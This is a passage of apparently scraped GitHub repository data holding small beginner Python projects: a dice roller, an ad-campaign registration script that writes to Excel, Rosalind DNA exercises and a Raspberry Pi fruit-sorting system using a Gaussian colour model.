range(skill):\n face = random.randint(1, 12)\n rawResult['Skill die ' + str(die + 1)] = skillDice[face]\n\n pp.pprint(rawResult)\n print('')\n print(f\"You can keep up to {ring} dice from this roll.\\n\")\n\n # Now let's select the dice we want to keep.\n keptDice = {}\n\n for die in range(ring):\n choices = list(rawResult.keys())\n choice = pyip.inputMenu(choices + ['No more dice.'], lettered=True)\n if choice == 'No more dice.':\n break\n else:\n keptDice[choice] = rawResult[choice]\n del rawResult[choice]\n pp.pprint(rawResult)\n\n print(\"You kept:\\n\")\n pp.pprint(keptDice)\n # now let's make some dice explode\n # This needs to be recursive.\n # we will ask for each of those if the player wants to keep them or not.\n\n keptDiceToExplode = {key: value for key, value in keptDice.items() if 'Explosive' in value[0]}\n keptDiceNotToExplode = {key: value for (key, value) in keptDice.items() if 'Explosive' not in value[0]}\n explodedDice = {}\n\n # recursive explosion\n hasExplosionHappened = False\n while len(keptDiceToExplode):\n hasExplosionHappened = True\n print('\\n\\nYou have some dice to explode!\\n')\n # we'll populate our dict of exploded dice\n for k in keptDiceToExplode.keys():\n if 'Ring' in k:\n explodedDice['Extra die from ' + k] = ringDice[random.randint(1, 6)]\n print('You rolled', explodedDice['Extra die from ' + k])\n elif 'Skill' in k:\n explodedDice['Extra die from ' + k] = skillDice[random.randint(1, 12)]\n print('You rolled', explodedDice['Extra die from ' + k])\n\n # Now let's keep some exploded dice\n keptExplodedDice = {}\n for die in explodedDice.keys():\n choice = pyip.inputYesNo(prompt=f'Do you want to keep {explodedDice[die]}?\\n')\n if choice == 'yes':\n keptExplodedDice[die] = explodedDice[die]\n\n # now generate a new keptDiceThatHaveExploded dic from the values of keptDiceToExplode\n keptDiceThatHaveExploded = {}\n for k in keptDiceToExplode.keys():\n keptDiceThatHaveExploded[k] = [keptDiceToExplode[k][0].replace('Explosive ', ''), keptDiceToExplode[k][1]]\n\n # now let's reunite our kept dice\n keptDice = {}\n keptDice.update(keptDiceNotToExplode)\n keptDice.update(keptDiceThatHaveExploded)\n keptDice.update(keptExplodedDice)\n\n # let's regenerate our 3 temp dicts from above to check if we have new dice to explode\n keptDiceToExplode = {key: value for key, value in keptDice.items() if 'Explosive' in value[0]}\n keptDiceNotToExplode = {key: value for (key, value) in keptDice.items() if 'Explosive' not in value[0]}\n explodedDice = {}\n\n if 
hasExplosionHappened:\n print('\\nAfter all these explosions, you kept:\\n')\n pp.pprint(keptDice)\n\n print(\"\\nFinal result:\\n\")\n finalList = []\n for value in keptDice.values():\n finalList += value\n\n # Compute the total successes, opportunity and strife gained from roll\n successes = finalList.count('Success')\n opportunities = finalList.count('Opportunity')\n strife = finalList.count('Strife')\n\n print(f'You gained {successes} successes, {opportunities} opportunities, and {strife} strife.')\n return (successes, opportunities, strife)\n"
}
] | 2 |
lucasdev3/Projeto_Anuncio_Capgemini | https://github.com/lucasdev3/Projeto_Anuncio_Capgemini | bb12219bd51f2de1a787d5dd44f43667536e3509 | 469e3a3cb2c5ce01354dd7ef67b8c810413606dc | 4b5097194c54114c13e16a77450a9db1be40f2c2 | refs/heads/main | 2023-04-19T20:18:26.862330 | 2021-05-16T23:11:06 | 2021-05-16T23:11:06 | 368,002,304 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4910486042499542,
"alphanum_fraction": 0.5447570085525513,
"avg_line_length": 19.552631378173828,
"blob_id": "f7a4f291b49dfa6f77d546a8e0f66a074352dd9b",
"content_id": "dcba48a3461b45408c109d67f53eaddaafee139a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 782,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 38,
"path": "/calculaDatas.py",
"repo_name": "lucasdev3/Projeto_Anuncio_Capgemini",
"src_encoding": "UTF-8",
"text": "from datetime import datetime\n\n\ndef getDifference(inicio, fim, interval=\"secs\"):\n\n\n\n duration = fim - inicio\n duration_in_s = duration.total_seconds()\n\n #Date and Time constants\n yr_ct = 365 * 24 * 60 * 60 # 31536000\n day_ct = 24 * 60 * 60 # 86400\n hour_ct = 60 * 60 # 3600\n minute_ct = 60\n\n def yrs():\n return divmod(duration_in_s, yr_ct)[0]\n\n def days():\n return divmod(duration_in_s, day_ct)[0]\n\n def hrs():\n return divmod(duration_in_s, hour_ct)[0]\n\n def mins():\n return divmod(duration_in_s, minute_ct)[0]\n\n def secs():\n return duration_in_s\n\n return {\n 'yrs': int(yrs()),\n 'days': int(days()),\n 'hrs': int(hrs()),\n 'mins': int(mins()),\n 'secs': int(secs())\n }[interval]\n\n"
},
{
"alpha_fraction": 0.5562015771865845,
"alphanum_fraction": 0.5738856792449951,
"avg_line_length": 35.37004470825195,
"blob_id": "263d267e0d3b09e70a11c7f6159c3e435574d468",
"content_id": "2fcccb69f3931db27fba6f20b13a6cdcf4ad49b4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8264,
"license_type": "permissive",
"max_line_length": 140,
"num_lines": 227,
"path": "/cadastro.py",
"repo_name": "lucasdev3/Projeto_Anuncio_Capgemini",
"src_encoding": "UTF-8",
"text": "from datetime import datetime\nfrom calculaDatas import getDifference\nfrom time import sleep\nimport os\nfrom openpyxl import *\n\n\nid = 1\nl = 2\ncont = 0\nbanco = {}\nbancoFiltroDataMaior = {}\nbancoFiltroDataMenor = {}\nbancoFiltroCliente = {}\n\n# ---------------- INICIANDO A TABELA EM EXCEL -----------------\nwb = load_workbook(filename='banco_de_dados.xlsx')\nsh = wb.worksheets[0]\n# ------------------------------CADASTRO------------------------\n\nwhile True:\n try:\n qnt = int(input('Quantos anuncios gostaria de cadastrar? '))\n print('\\n')\n break\n except ValueError as e:\n print('Digite apenas numeros inteiros...', e)\n\nwhile cont < qnt:\n gradeGeral = []\n gradeCadastro = []\n gradeRelatorio = []\n gradeFiltroDataMaior = []\n gradeFiltroDataMenor = []\n gradeCadastroMaiorSete = []\n gradeRelatorioMaiorSete = []\n gradeCadastroMenorSete = []\n gradeRelatorioMenorSete = []\n\n anuncio = input('Nome do anuncio: ').title().strip()\n sh[f'C{l}'] = anuncio\n gradeCadastro.append(anuncio)\n cliente = input('Nome do cliente: ').title().strip()\n sh[f'B{l}'] = cliente\n gradeCadastro.append(cliente)\n dataInicio = input('Data de inicio Exemplo [ 20-05-2000 ]: ').strip()\n sh[f'D{l}'] = dataInicio\n gradeCadastro.append(dataInicio)\n dataTermino = input('Data de término Exemplo [ 20-05-2000 ]: ').strip()\n sh[f'E{l}'] = dataTermino\n gradeCadastro.append(dataTermino)\n while True:\n try:\n investimentoDia = int(input('Investimento diário: R$ '))\n sh[f'F{l}'] = investimentoDia\n gradeCadastro.append(investimentoDia)\n break\n except ValueError as e:\n print('Digite somente numeros inteiros...', e)\n # ------------------------ CRIAÇÃO DA GRADE DE RELATORIO -----------------\n # ----------------------------CALCULO DE RELATORIO -----------------------\n\n a1 = int(dataInicio[6:12])\n m1 = int(dataInicio[3:5])\n d1 = int(dataInicio[0:2])\n\n a2 = int(dataTermino[6:12])\n m2 = int(dataTermino[3:5])\n d2 = int(dataTermino[0:2])\n\n inicio = datetime(a1, m1, d1) # yr, mo, day, hr, min, sec\n fim = datetime(a2, m2, d2)\n\n viewsInit = 30 * investimentoDia\n cliques = viewsInit * 0.12\n sh[f'I{l}'] = cliques\n compartilhamentos = (0.15 * cliques) * 4\n sh[f'J{l}'] = compartilhamentos\n newViews = int(compartilhamentos * 40)\n totalViews = int(viewsInit + newViews)\n sh[f'H{l}'] = totalViews\n investimentoTotal = investimentoDia * (getDifference(inicio, fim, 'days'))\n sh[f'G{l}'] = investimentoTotal\n gradeRelatorio.append(investimentoTotal)\n gradeRelatorio.append(totalViews)\n gradeRelatorio.append(cliques)\n gradeRelatorio.append(compartilhamentos)\n\n gradeRelatorioMenorSete = gradeRelatorio\n gradeCadastroMenorSete = gradeCadastro\n gradeRelatorioMaiorSete = gradeRelatorio\n gradeCadastroMaiorSete = gradeCadastro\n\n # ----------------------FILTRAR POR DATA COLOCANDO AS INFORMAÇÕES EM LISTAS DIFERENTES --------------------\n\n # ANUNCIOS COM MAIS DE 7 DIAS\n if getDifference(inicio, fim, 'days') > 7:\n gradeFiltroDataMaior.append(gradeCadastroMaiorSete)\n gradeFiltroDataMaior.append(gradeRelatorioMaiorSete)\n # ANUNCIOS COM MENOS DE 7 DIAS\n else:\n gradeFiltroDataMenor.append(gradeCadastroMenorSete)\n gradeFiltroDataMenor.append(gradeRelatorioMaiorSete)\n bancoFiltroDataMaior[id] = gradeFiltroDataMaior\n bancoFiltroDataMenor[id] = gradeFiltroDataMenor\n # RETIRANDO CHAVES COM LISTAS VAZIAS\n while bancoFiltroDataMenor[id] == []:\n bancoFiltroDataMenor.pop(id)\n break\n while bancoFiltroDataMaior[id] == []:\n bancoFiltroDataMaior.pop(id)\n break\n\n # ----------------- CADASTROS 
E RELATORIOS GERAIS ----------------------------------\n\n gradeGeral.append(gradeCadastro)\n gradeGeral.append(gradeRelatorio)\n\n banco[id] = gradeGeral\n\n # ------------------------ FILTRO DE CLIENTES ---------------------------\n\n bancoFiltroCliente[cliente] = gradeGeral\n\n # -------------------------------------------------------------------------\n\n id += 1\n cont += 1\n l += 1\n print('\\n')\n# ------------------------IMPRESSÃO DE DADOS NA TELA PARA O USUÁRIO MOSTRANDO OS ANUNCIOS E SEUS RELATORIOS----------\n\ntitulo2 = 'GERANDO RELATORIO'\nprint('-' * len(titulo2))\nprint(titulo2)\nprint('-' * len(titulo2))\nsleep(4)\n# ----------------------------- RELATORIO GERAL ------------------------------------\nfor i, j in banco.items():\n cadastro = banco[i][0]\n relatorio = banco[i][1]\n print('\\n')\n print(\n 'ID Anuncio: {} | Cliente: {} | Anuncio: {} | Data de Inicio: {} | Data de Termino: {} | Investimento Inicial: R${:.2f}'.format(\n i, cadastro[1], cadastro[0], cadastro[2], cadastro[3], float(cadastro[4])))\n print('\\n')\n print(\n 'Investimento Total: R${:.2f} | Vizualizacoes Max.: {} | Cliques Max.: {} | Compartilhamentos Max.: {}'.format(\n float(relatorio[0]), relatorio[1], relatorio[2], int(relatorio[3])))\n print('\\n')\n\nprint('\\n')\n# ------------------ RELATORIO POR TEMPO --------------------------------\nfiltroData = input('Gostaria de filtrar os anuncios por data?[S / N]: ').strip().lower()\n# --------------------MAIS DE 7 DIAS ---------------------\nif filtroData == 's':\n titulo3 = 'FILTRANDO ANUNCIOS COM MAIS DE 7 DIAS '\n print('-' * len(titulo3))\n print(titulo3)\n print('-' * len(titulo3))\n sleep(4)\n for i, j in bancoFiltroDataMaior.items():\n cadastro = bancoFiltroDataMaior[i][0]\n relatorio = bancoFiltroDataMaior[i][1]\n print('\\n')\n print(\n 'ID Anuncio: {} | Cliente: {} | Anuncio: {} | Data de Inicio: {} | Data de Termino: {} | Investimento Inicial: R${:.2f}'.format(\n i, cadastro[1], cadastro[0], cadastro[2], cadastro[3], float(cadastro[4])))\n print('\\n')\n print(\n 'Investimento Total: R${:.2f} | Vizualizacoes Max.: {} | Cliques Max.: {} | Compartilhamentos Max.: {}'.format(\n float(relatorio[0]), relatorio[1], int(relatorio[2]), int(relatorio[3])))\n print('\\n')\n\n print('\\n')\n\n titulo4 = 'FILTRANDO ANUNCIOS COM MENOS DE 7 DIAS '\n print('-' * len(titulo4))\n print(titulo4)\n print('-' * len(titulo4))\n sleep(4)\n # --------------------- MENOS DE 7 DIAS ---------------------\n for i, j in bancoFiltroDataMenor.items():\n cadastro = bancoFiltroDataMenor[i][0]\n relatorio = bancoFiltroDataMenor[i][1]\n print('\\n')\n print(\n 'ID Anuncio: {} | Cliente: {} | Anuncio: {} | Data de Inicio: {} | Data de Termino: {} | Investimento Inicial: R${:.2f}'.format(\n i, cadastro[1], cadastro[0], cadastro[2], cadastro[3], float(cadastro[4])))\n print('\\n')\n print(\n 'Investimento Total: R${:.2f} | Vizualizacoes Max.: {} | Cliques Max.: {} | Compartilhamentos Max.: {}'.format(\n float(relatorio[0]), relatorio[1], int(relatorio[2]), int(relatorio[3])))\n print('\\n')\nfiltroCliente = input('Gostaria de filtrar os anuncios por Cliente? 
[S / N]: ').lower().strip()\nprint(\"\\n\")\n# --------------- ORDENAR OS ANUNCIOS EM ORDEM ALFABETICA COMO BASE O NOME DOS CLIENTES --------------------\ntitulo5 = 'LISTANDO CLIENTES EM ORDEM ALFABETICA'\nprint('-' * len(titulo5))\nprint(titulo5)\nprint('-' * len(titulo5))\nsleep(4)\nif filtroCliente == 's':\n for i in sorted(bancoFiltroCliente, key=bancoFiltroCliente.get(1)):\n a = bancoFiltroCliente[i][0]\n b = bancoFiltroCliente[i][1]\n print('\\n')\n print(\n 'Cliente: {} | Anuncio: {} | Data de Inicio: {} | Data de Termino: {} | Investimento Inicial: R${:.2f}'.format(\n a[1], a[0], a[2], a[3], a[4]))\n print('\\n')\n print('Investimento Total: R${} | Vizualizacoes Max.: {} | Cliques Max.: {} | Compartilhamentos Max.: {}'.format(\n b[0], b[1], b[2], int(b[3])))\n print('\\n')\n\nprint('\\n')\nwb.save(f\"banco_de_dados.xlsx\")\naviso1 = 'Salvando relatorio geral em uma Planilha Excel'\naviso2 = 'Acesse a pasta do programa para abrir'\nprint('-' * len(aviso1))\nprint(aviso1)\nprint(aviso2)\nprint('-' * len(aviso1))\nsleep(4)\n\n\nos.system(\"pause\")\n"
},
{
"alpha_fraction": 0.6646825671195984,
"alphanum_fraction": 0.6884920597076416,
"avg_line_length": 32.66666793823242,
"blob_id": "63b2258057295e310dd9d78c167c53f3ad04fa38",
"content_id": "4c281ec63e44e9eb865bb7454efafa53e83d66f4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 506,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 15,
"path": "/Calculadora.py",
"repo_name": "lucasdev3/Projeto_Anuncio_Capgemini",
"src_encoding": "UTF-8",
"text": "import os\nwhile True:\n try:\n investimento_dia = int(input(\"Valor a ser investido: R$\"))\n break\n except ValueError:\n print('Digite somente valores inteiros...')\nviews_init = 30 * investimento_dia\ncliques = 0.12 * views_init\ncompartilhamentos_max = (cliques * 0.15) * 4\nnew_views = int(compartilhamentos_max * 40)\ntotal_views = new_views + views_init\n\nprint(\"Valor Investido: R${:.2f} | Projeção de Alcance: {} visualizacoes\".format(investimento_dia, total_views))\nprint(cliques)"
},
{
"alpha_fraction": 0.7614138722419739,
"alphanum_fraction": 0.76877760887146,
"avg_line_length": 44.266666412353516,
"blob_id": "51db9260bc8056ec435de689206be0e2a152cdf6",
"content_id": "9ee0f8a777ee795e63901b67a42669074f398151",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 689,
"license_type": "permissive",
"max_line_length": 131,
"num_lines": 15,
"path": "/README.md",
"repo_name": "lucasdev3/Projeto_Anuncio_Capgemini",
"src_encoding": "UTF-8",
"text": "# Projeto_Anuncio_Capgemini\n Projeto_Cadastro_De_Anuncios\n Programas utilizados:\n- IDE Utilizada -> PyCharm - Community\n- Excel\n\n#Instruções de Uso\n\n1. -> Abrir a pasta \"Projeto_Anuncio_Capgemini\"\n2. -> Abrir o arquivo \"cadastro.py\"\n3. -> Para compilar o arquivo, basta clicar no arquivo pelo PyCharm com o botão direito e clicar em \"Run\" ou compilar via terminal.\n4. -> O programa irá alocar os registros dos anuncios na planilha Excel \"banco_de_dados.xlsx\".\n5. -> Para consultar os anuncios inseridos basta abrir o arquivo Excel que estará na mesma pasta.\n\nOBS: Sou iniciante na área da tecnologia da informação, Python foi o meu primeiro contato com Linguagem de Programação.\n"
}
] | 4 |
tpeaton/rosalind | https://github.com/tpeaton/rosalind | 11303be1c74ec564efdd01322e12de8dd229241c | fd16163553f4a3bb1bb1f507b65995c2b3ae3f3e | c94dd15850a367bd372ffb92226d0e4456864274 | refs/heads/master | 2016-03-30T23:34:53.840803 | 2013-09-12T22:01:05 | 2013-09-12T22:01:05 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7272727489471436,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 17.5,
"blob_id": "c67ad44b5d9d8873a5fe5f49995394db34a56868",
"content_id": "8306fdec1290a5a949a9076ca5398601e2b2a1fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 110,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 6,
"path": "/RNA.py",
"repo_name": "tpeaton/rosalind",
"src_encoding": "UTF-8",
"text": "sample = 'GATGGAACTTGACTACGTAAATT'\n\ndef DNAtoRNA(dna):\n return dna.replace('T','U')\n\nprint DNAtoRNA(sample)"
},
{
"alpha_fraction": 0.6024096608161926,
"alphanum_fraction": 0.6024096608161926,
"avg_line_length": 21.727272033691406,
"blob_id": "deb15745631c9917fe57114430849aefbcd0bbdb",
"content_id": "92a74b12b9a4c121bb82329b81cd49ba597edc9d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 249,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 11,
"path": "/REVC.py",
"repo_name": "tpeaton/rosalind",
"src_encoding": "UTF-8",
"text": "sampleDNA = 'AAAACCCGGT'\n\ndef DNARevCompliment(dna):\n DNAComp = {'A': 'T', 'T': 'A', 'C': 'G', 'G': 'C'}\n reverseComp = ''\n for x in reversed(dna):\n reverseComp += DNAComp[x]\n\n return reverseComp\n\nprint DNARevCompliment(sampleDNA)"
},
{
"alpha_fraction": 0.45895522832870483,
"alphanum_fraction": 0.4738805890083313,
"avg_line_length": 25.850000381469727,
"blob_id": "e21151b51acefad54b30c9f610acd6b9b4285388",
"content_id": "1792f53e665d96b0af6d59ac10400f991296e99b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 536,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 20,
"path": "/DNA.py",
"repo_name": "tpeaton/rosalind",
"src_encoding": "UTF-8",
"text": "sample = 'AGCTTTTCATTCTGACTGCAACGGGCAATATGTCTCTGTGTGGATTAAAAAAAGAGTGTCTGATAGCAGC'\n\n\ndef countNucleotides(strand):\n counts = {'A': 0, 'C': 0, 'G': 0, 'T': 0}\n\n for x in strand:\n if x == 'A':\n counts['A'] += 1\n elif x == 'C':\n counts['C'] += 1\n elif x == 'G':\n counts['G'] += 1\n elif x == 'T':\n counts['T'] += 1\n\n return str(counts['A']) + ' ' + str(counts['C']) + ' ' + str(counts['G']) \\\n + ' ' + str(counts['T'])\n\nprint countNucleotides(sample)"
}
] | 3 |
clary045/GMM | https://github.com/clary045/GMM | fd6e30c653f568b22e1416cb53f0864cb0736c4a | 97a7f2d391ce5570975ae11e23286549bbd5d032 | eb77d3cd0cc9650153fd908fd5a5dac315537396 | refs/heads/main | 2023-02-09T19:39:20.863260 | 2021-01-04T08:32:22 | 2021-01-04T08:32:22 | 312,143,041 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7704917788505554,
"alphanum_fraction": 0.7885245680809021,
"avg_line_length": 29.5,
"blob_id": "e31cf99ac2987755443cf7681c38b1b57c03a1e8",
"content_id": "13b5435c858d3f812a2ef07608a6855fe86ba13d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 616,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 20,
"path": "/README.md",
"repo_name": "clary045/GMM",
"src_encoding": "UTF-8",
"text": "This project is using Gaussian Mixture Model to detect orange and apple and sorting them to their respective boxes.\nIt contains the following python file.\n1. Data collection using Matlab\n2. detect Orange function \n3. detect apple function\n4. Implementation in real time\n\nRequirements:\n\nThe GMM algorithm uses the following python package:\n1. numpy\n2. pandas\n3. scipy\n4. Open cv\n5. For dataset you can create your own. The minimum should be atleast 50 image for each class (orange class 🍊 and apple class🍎.\n\nContacts:\n\nFor reporting bugs or help regarding any aspect of the GMM algorithm, please email:\[email protected]\n"
},
{
"alpha_fraction": 0.3829154372215271,
"alphanum_fraction": 0.4521887004375458,
"avg_line_length": 38.568965911865234,
"blob_id": "cb92cbc147d37fe0153b0791f18ac13f75c9d4a0",
"content_id": "dc1d89e40946520eccff80a2c1138fc98d93ed0f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2353,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 58,
"path": "/detectOrangeFunc.py",
"repo_name": "clary045/GMM",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 29 23:29:39 2020\r\n######################################################################\r\n# Development Of an Embedded Vision Based Fruit Sorting Machine #####\r\n@author: CLARY NORMAN (2017141960) ####\r\n\"\"\" #####\r\n####################################################################\r\nimport numpy as np\r\nimport cv2 \r\n\r\ndef detectOrange(I):\r\n # load or hard code your parameters here\r\n mu = np.array([200.224,123.543,32.4314])\r\n #m1 = mu.reshape(1,3)\r\n sigma = np.array([[746.829,613.434,114.998],[613.434,724.818,380.201],[114.998,380.201,698.326]])\r\n threshold = 2.04108e-07\r\n D = 3\r\n ########################################################################################################################\r\n # find the ball color pixel using your model\r\n ########################################################################################################################\r\n #output1 = cv2.resize(I, (400,400))\r\n im_rgb1 = cv2.cvtColor(I, cv2.COLOR_BGR2RGB)\r\n im_rgb = cv2.cvtColor(I, cv2.COLOR_BGR2HSV)\r\n# cv2.imshow('Origial Orange fruit',output)\r\n\r\n\r\n R = im_rgb1[:,:,0]\r\n G = im_rgb1[:,:,1]\r\n B = im_rgb1[:,:,2]\r\n\r\n S = np.zeros([50,50])\r\n\r\n for m in range(50):\r\n for n in range (50):\r\n r = R[m,n]\r\n g = G[m,n]\r\n b = B[m,n]\r\n x = np.double([r,g ,b])\r\n SIGMA_inv = np.linalg.inv(sigma)\r\n denominator = np.sqrt((2 * np.pi)**D * np.linalg.det(sigma))\r\n exponent = -(1/2) * ((x - mu).T @ SIGMA_inv @ (x - mu ))\r\n p = float((1. / denominator) * np.exp(exponent) ) \r\n if (p > threshold):\r\n S[m,n] = True\r\n\r\n # Calculating the pixel of the Orange fruit \r\n pixels = cv2.countNonZero(S) \r\n image_area = im_rgb1.shape[0] * im_rgb1.shape[1]\r\n area_ratio1 = (pixels / image_area) * 100 \r\n # apply morphological method to fill the holes\r\n kernel = np.ones((5,5),np.uint8)\r\n dilation = cv2.dilate(S,kernel,iterations = 1)\r\n closing = cv2.morphologyEx(dilation, cv2.MORPH_CLOSE, kernel) \r\n # covert binary image to its original image without the background\r\n mask = np.atleast_3d(closing)\r\n red1 = np.uint8(mask)*I\r\n return red1,area_ratio1,S,I\r\n"
},
{
"alpha_fraction": 0.5171743631362915,
"alphanum_fraction": 0.5482825636863708,
"avg_line_length": 31.0625,
"blob_id": "a1658398dda6b239f272fc49c5b29f976f5702ec",
"content_id": "a89ef00fe2f8a79165a3333590598360f1aa9ec0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1543,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 48,
"path": "/DataCollection.py",
"repo_name": "clary045/GMM",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 24 14:36:45 2020\n######################################################################\n# Development Of an Embedded Vision Based Fruit Sorting Machine #####\n@author: CLARY NORMAN (2017141960) ####\n\"\"\" #####\n####################################################################\n# Code for training the model\nfrom mpl_toolkits import mplot3d \nimport numpy as np \nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy\n\n# calculating the mean and standard deviation \ndf = pd.read_csv (r'C:\\Users\\CLARY NORMAN\\Documents\\2020\\2nd semester\\Capstone 2\\Fruit sorting\\samples\\apple\\Apple_data_training')\n#reading dataset \nr = df.iloc[:,0]\ng = df.iloc[:,1]\nb = df.iloc[:,2]\n\n# Creating figure \nfig = plt.figure(figsize = (10, 7)) \nax = plt.axes(projection =\"3d\") \n# Creating plot \nax.scatter3D(r, g,b,color =\"red\"); \nplt.title(\"pixel color distribution\") \nplt.xlabel(\"Red\")\nplt.ylabel(\"Green\");\n#plt.zlabel(\"Blue\");\nplt.show()\n#choose model type and estimate the parameters (mu and Sigma) from the sample data.\nD = 3\nX = np.double(df)\nmu = numpy.mean(X,axis = 0)\ns = df.shape\nsigma = np.cov(df,rowvar = 0)\np = np.zeros(s[0])\n\nfor n in range(0,s[0]): \n B = X[n,:]\n SIGMA_inv = np.linalg.inv(sigma)\n denominator = np.sqrt((2 * np.pi)**D * np.linalg.det(sigma))\n exponent = -(1/2) * ((B - mu).T @ SIGMA_inv @ (B - mu ))\n p[n] = float((1. / denominator) * np.exp(exponent) ) \n \n print (p[n])\n "
},
{
"alpha_fraction": 0.40963855385780334,
"alphanum_fraction": 0.4403931498527527,
"avg_line_length": 34.69767379760742,
"blob_id": "ee38ce334eb8cf0a759d2e1d3fb4bc36671083af",
"content_id": "78bf7642bbde4f2e29f62c0d76ffa4972e1d460c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3154,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 86,
"path": "/test.py",
"repo_name": "clary045/GMM",
"src_encoding": "UTF-8",
"text": "########################################################################################################\r\n################# Development of an embedded Vision Based Fruit Sorting Machine ########################\r\n################# BY: Clary Norman (ID: 2017141960) ########################\r\n########################################################################################################\r\nimport os\r\nfrom gpiozero import MotionSensor\r\nimport cv2 \r\nimport matplotlib.pyplot as plt\r\nfrom picamera.array import PiRGBArray\r\nfrom picamera import PiCamera\r\nimport time\r\nimport RPi.GPIO as GPIO\r\n# servo motor\r\nGPIO.setmode(GPIO.BOARD)\r\nservoPin= 22\r\nGPIO.setmode(GPIO.BOARD)\r\nservoPin_1 = 24\r\n\r\ndesiredPosition1 = 0\r\ndesiredPosition2 = 75\r\ndesiredPosition3 = 180\r\ndesired_1 = 0\r\ndesired_2 = 75\r\ndesired_3 = 180\r\nGPIO.setup(servoPin,GPIO.OUT)\r\nGPIO.setup(servoPin_1,GPIO.OUT)\r\npwm=GPIO.PWM(servoPin,50)\r\npwm_1 =GPIO.PWM(servoPin_1,50)\r\n\r\npir = MotionSensor (24)\r\ncamera = PiCamera()\r\nprint(\"Developement of an Embeeded Vision Based Fruit Sorting Machine\")\r\nprint(\"By: Clary Norman (2017141960)\")\r\ntime.sleep(4)\r\nos.system('cls')\r\nprint(\"\")\r\nprint(\"PLace the fruit\")\r\nwhile True:\r\n if pir.wait_for_motion(): #object is near\r\n print(\"Fruit detected..\")\r\n rawCapture = PiRGBArray(camera)\r\n time.sleep(1)\r\n camera.capture(rawCapture,format = 'bgr')\r\n time.sleep(5)\r\n I = rawCapture.array\r\n from detectOrangeFunc import detectOrange\r\n [y,x,z,r] = detectOrange(I)\r\n\r\n from detectAppleFunc import detectApple\r\n [y1,x1,z1,t] = detectApple(I)\r\n\r\n ## Classification:\r\n print(\"\")\r\n print (\"number of pixels for orange: \")\r\n print (x)\r\n print (\"number of pixels for apple: \")\r\n print (x1)\r\n\r\n if x > 5:\r\n print(\"\")\r\n print(\"Orange\")\r\n show = cv2.cvtColor(I, cv2.COLOR_BGR2RGB)\r\n plt.imshow(show,cmap = 'gray')\r\n plt.show()\r\n pwm.start(7)\r\n DC = 1./15.*(desiredPosition1)+2\r\n pwm.ChangeDutyCycle(DC)\r\n time.sleep(2)\r\n DC = 1./15.*(desiredPosition3)+2\r\n pwm.ChangeDutyCycle(DC)\r\n elif x1 > 5:\r\n print(\"\")\r\n print(\"Apple\")\r\n plt.imshow(I,cmap = 'gray')\r\n plt.show()\r\n pwm_1.start(7)\r\n DC_1 = 1./15.*(desired_1)+2\r\n pwm_1.ChangeDutyCycle(DC_1)\r\n time.sleep(2)\r\n DC_1 = 1./15.*(desired_3)+2\r\n pwm_1.ChangeDutyCycle(DC_1)\r\n else: \r\n print('Unclassified fruit')\r\n if pir.wait_for_no_motion(): #object is far away\r\n print(\"\")\r\n print ('Place the fruit')"
},
{
"alpha_fraction": 0.37731871008872986,
"alphanum_fraction": 0.4443507492542267,
"avg_line_length": 41.05454635620117,
"blob_id": "5f2917b217a0ed23e7bf928fc178f845d60c62a7",
"content_id": "b81481620d1d5a456bb9913f762b6f469408ca69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2372,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 55,
"path": "/detectAppleFunc.py",
"repo_name": "clary045/GMM",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 29 21:25:27 2020\r\n######################################################################\r\n# Development Of an Embedded Vision Based Fruit Sorting Machine #####\r\n@author: CLARY NORMAN (2017141960) ####\r\n\"\"\" #####\r\n####################################################################\r\nimport numpy as np\r\nimport cv2 \r\n\r\ndef detectApple(I): \r\n # load or hard code your parameters here\r\n mu = np.array([167.978,76.6507,65.574])\r\n sigma = np.array([[1068.4,1003.08,640.939],[1003.08,1468.42,999.001],[640.939,999.001,784.846]])\r\n threshold = 2.13807e-8\r\n D = 3\r\n ########################################################################################################################\r\n # find the ball color pixel using your model\r\n ########################################################################################################################\r\n #output = cv2.resize(I, (400,400))\r\n im_rgb1 = cv2.cvtColor(I, cv2.COLOR_BGR2RGB)\r\n im_rgb = cv2.cvtColor(I, cv2.COLOR_BGR2HSV)\r\n #cv2.imshow('Origial Apple fruit',output)\r\n\r\n R = im_rgb1[:,:,0]\r\n G = im_rgb1[:,:,1]\r\n B = im_rgb1[:,:,2]\r\n\r\n S1 = np.zeros([50,50])\r\n\r\n for m in range(50):\r\n for n in range (50):\r\n r = 